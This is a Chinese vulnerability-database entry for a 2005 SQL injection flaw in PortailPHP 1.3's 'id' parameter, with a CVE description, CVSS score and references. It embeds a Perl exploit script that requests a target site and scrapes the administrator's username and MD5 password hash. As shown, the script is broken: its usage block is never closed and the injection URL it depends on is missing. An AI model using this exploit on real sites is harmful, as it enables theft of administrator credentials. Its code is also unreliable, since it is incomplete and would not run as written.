发布时间 :2005-05-24 00:00:00
修订时间 :2016-10-17 23:21:59

[原文]SQL injection vulnerability in PortailPHP 1.3 allows remote attackers to execute arbitrary SQL commands via the id parameter to the (1) News, (2) File, (3) Liens, or (4) Faq modules.

[CNNVD]PortailPHP ID Parameter SQL注入漏洞(CNNVD-200505-1154)

        PortailPHP 1.3存在SQL注入漏洞,远程攻击者可以通过传给(1)新闻,(2)文件,(3)Liens或(4)Faq模块的id参数来执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20050521 SQL injections in PortailPHP
(UNKNOWN)  BID  13708

- 漏洞信息

PortailPHP ID Parameter SQL注入漏洞
高危 SQL注入
2005-05-24 00:00:00 2005-10-20 00:00:00
        PortailPHP 1.3存在SQL注入漏洞,远程攻击者可以通过传给(1)新闻,(2)文件,(3)Liens或(4)Faq模块的id参数来执行任意SQL命令。

- 公告与补丁


- 漏洞信息 (1031)

Portail PHP < 1.3 SQL Injection Exploit (EDBID:1031)
php webapps
2005-06-06 Verified
0 Alberto Trivero
N/A [点击下载]
#!/usr/bin/perl -w
# SQL Injection Exploit for Portail PHP < 1.3
# This exploit show the username of the administrator of the portal and his password crypted in MD5
# Related advisory:
# Coded by Alberto Trivero

use LWP::Simple;

print "\n\t=================================\n";
print "\t= Exploit for Portail PHP < 1.3 =\n";
print "\t= Alberto Trivero - =\n";
print "\t=================================\n\n";

if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
   print "Usage:\nperl $0 [full_target_path]\n\n";
   print "Examples:\nperl $0\n";

$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/0000-00-00, 0  \)<\/i>     <br><br><br><br><\/td>   <\/tr>   <tr>     <td width='100%'>(.*?)<\/td>   <\/tr>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1);
$page=~m/<img border='0' src='\.\/images\/ico_liens\.gif' >&nbsp;<b> <\/b>: (.*?)<\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# [2005-06-06]

- 漏洞信息

PortailPhp index.php id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Unknown

- 漏洞描述

PortailPHP contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'id' variable in the 'index.php' script not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

- 时间线

2005-05-21 Unknow
2005-06-06 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者